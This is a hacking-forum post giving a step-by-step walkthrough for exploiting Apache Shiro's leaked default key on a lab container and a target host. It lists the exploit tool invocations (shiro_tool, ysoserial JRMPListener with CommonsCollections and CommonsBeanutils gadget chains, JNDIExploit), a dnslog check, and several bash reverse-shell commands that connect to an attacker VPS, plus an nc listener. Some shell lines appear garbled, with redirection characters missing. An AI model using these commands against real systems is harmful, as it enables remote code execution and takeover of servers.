Jump to content

Title: Shiro leaks key dependency-free chain utilization techniques

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

Get the environment:

Pull the mirror to the local

$ docker pull medicean/vulapps:s_shiro_1

Start the environment

$ docker run -d -p 80:8080 medicean/vulapps:s_shiro_11. Use shiro_attack_2.2 tool to check the target system and found that there is a default key but no utilization chain

image_ylgMY223mT.png

2. Use shior_tools.jar to directly detect the target system. After the detection is completed, the executable operation will be returned.

java -jar shiro_tool.jar http://10.11.10.108:8081/login.jsp

4ffy5k1ilct18578.png

2. Select 0 and enter the dnslog address. There is an echo through the dnslog test. Here is a note: using http://dnslog.cn/Some sites will intercept, and you can change to multiple dnslog platforms to test.

image_htB_EhwPH9.png

DNSlog has echoes. Next, I will get the shell. Due to fixed thinking, I encountered Linux before. I thought it was Linux, but I didn't use it successfully. At first, I thought it was firewall intercepting. Later, I detected the directory structure and found that it was Windows, so I had to change the payload here.

3. Use ysoserial to open the port on the public network VPS and execute the rebound command

java -cp ysoserial-master-30099844c6-1.jar ysoserial.exploit.JRMPListener 1999 CommonsCollections5 'Bash command after encoding'

r24efpbkgzp18582.png

image_wvD-c4KvV-.png

1049983-20231226000544164-439019386.jpg

The encoding content here is in step 4

Pit 1: CommonsCollection1-5 If the shell does not rebound, use it instead

4. Bash rebound command edit

https://x.hacking8.com/java-runtime.html//encoded link

The following three types of execution commands are selected as appropriate:

Pit 2: The bash command executed here first depends on the other party's running system. If it is linxu, try the following three. If it is win, please send the Baidu rebound command separately.

bash -i /dev/tcp/VPSIP/7777 01

/bin/bash -i /dev/tcp/VPSIP/7777 01 21

0196;exec 196/dev/tcp/VPSIP/7777; sh 196 196 2196

Here is the second type, ip: is the IP that accepts the shell's vps, port: is the port that uses NC to open the monitoring and rebound to

/bin/bash -i /dev/tcp/192.168.14.222/8888 01 21

b1hcshz2air18589.png

Windows: java -cp ysoserial-0.0.6-SNAPSHOT-1.8.3.jar ysoserial.exploit.JRMPListener 88 CommonsBeanutils2 'ldap://VPS address :1389/Basic/Command/Base64/d2hvYW1p'

d2hvYW1p is the base64 of the command, here is the execution command whoami

java -jar JNDIExploit-1.0-SNAPSHOT.jar -i VPS address

5. NC monitoring

c3szokthjjd18591.png

6. Enter the ports opened by the vps of the shell and the java-ysoserial-JRMPListener (select 1 here, use JRMPClient to rebound the shell)

ocdad3nkhq018592.png

7. Successful execution, rebound shell

akw5jjfmkif18594.png

24mo02u01nb18596.png

lrbgcfiffq218597.png

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.